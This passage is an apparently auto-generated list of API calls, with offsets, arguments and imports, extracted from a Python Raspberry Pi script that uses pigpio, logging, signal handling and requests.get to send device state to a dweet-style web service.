] | [((231, 242), 'pigpio.pi', 'pigpio.pi', ([], {}), '()\n', (240, 242), False, 'import pigpio\n'), ((407, 449), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.WARNING'}), '(level=logging.WARNING)\n', (426, 449), False, 'import logging\n'), ((491, 516), 'logging.getLogger', 'logging.getLogger', (['"""main"""'], {}), "('main')\n", (508, 516), False, 'import logging\n'), ((1030, 1055), 'os.path.exists', 'os.path.exists', (['dweetFile'], {}), '(dweetFile)\n', (1044, 1055), False, 'import os\n'), ((1488, 1523), 'requests.get', 'requests.get', (['URL'], {'params': 'stateJson'}), '(URL, params=stateJson)\n', (1500, 1523), False, 'import requests\n'), ((1851, 1868), 'requests.get', 'requests.get', (['URL'], {}), '(URL)\n', (1863, 1868), False, 'import requests\n'), ((2562, 2606), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'signal_handler'], {}), '(signal.SIGINT, signal_handler)\n', (2575, 2606), False, 'import signal\n'), ((3795, 3806), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3803, 3806), False, 'import sys\n'), ((3930, 3938), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (3935, 3938), False, 'from time import sleep\n'), ((3967, 3975), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (3972, 3975), False, 'from time import sleep\n'), ((4645, 4653), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (4650, 4653), False, 'from time import sleep\n'), ((1224, 1231), 'uuid.uuid1', 'uuid1', ([], {}), '()\n', (1229, 1231), False, 'from uuid import uuid1\n')] |